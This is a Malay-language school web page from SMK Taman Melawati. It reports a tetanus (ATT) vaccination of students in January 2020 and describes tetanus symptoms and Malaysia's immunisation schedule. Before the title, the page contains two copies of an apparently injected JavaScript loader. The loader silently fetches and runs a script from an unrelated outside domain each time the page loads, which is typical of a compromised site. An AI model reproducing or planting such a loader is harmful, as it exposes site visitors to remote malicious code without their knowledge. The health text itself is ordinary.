;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ATT Vaksin | SMK Taman Melawati

Pada 15/1/2020. Murid-murid telah diberi suntikan ATT Vaksin.

Tetanus (kancing gigi) merupakan penyakit yang disebabkan oleh racun neurotoxin yang dihasilkan oleh bakteria Clostridium tetani. Bakteria Clostridium tetani hidup di dalam persekitaran terutamanya di kawasan tanah yang panas dan lembap. Bakteria ini boleh memasuki badan melalui kecederaan kulit yang disebabkan objek yang tercemar seperti paku dan jarum. Berbeza dengan penyakit-penyakit cegahan vaksin yang lain, penyakit tetanus tidak tersebar antara manusia sesama manusia.

Sebaik sahaja bakteria ini memasuki tubuh badan melalui luka yang tercemar, ia akan merembeskan racun neurotoxin dan racun ini seterusnya akan menyerang sistem saraf manusia yang akan menyebabkan gejala-gejala seperti berikut:

  • Sakit kepala
  • Ketegangan pada otot rahang
  • Ketegangan otot yang tidak terkawal secara mengejut (kadang-kala ketegangan berlaku pada otot yang membantu pernafasan dan ini menyebabkan masalah pernafasan)
  • Kekejangan otot yang menyakitkan di seluruh badan
  • Kesukaran menelan
  • Demam dan berpeluh
  • Peningkatan tekanan darah dan degupan jantung bertambah kencang
  • Sawan

Suntikan vaksin tetanus adalah disyorkan kepada semua golongan masyarakat kerana penyakit tetanus boleh menyerang sesiapa sahaja tanpa mengenal usia, jantina ataupun bangsa.

Pada masa kini, pemberian vaksin tetanus di bawah Program Imunisasi Kebangsaan KKM adalah disasarkan kepada golongan kanak-kanak dan wanita mengandung. Semua kanak-kanak akan menerima tiga (3) dos primer vaksin tetanus pada usia 2 bulan, 3 bulan dan 5 bulan dan dos booster pada usia 18 bulan. Dos booster yang seterusnya akan diberikan pada usia 7 tahun dan 15 tahun.

Suntikan vaksin tetanus juga diberikan kepada wanita yang mengandung bagi mencegah jangkitan tetanus bayi melalui luka tali pusat yang tidak dipotong dengan peralatan yang steril.

Orang awam yang tidak menerima dos booster tetanus melebihi 10 tahun dari pengambilan dos booster terakhir adalah digalakkan untuk menerima suntikan vaksin tetanus bagi mencegah penyakit berbahaya ini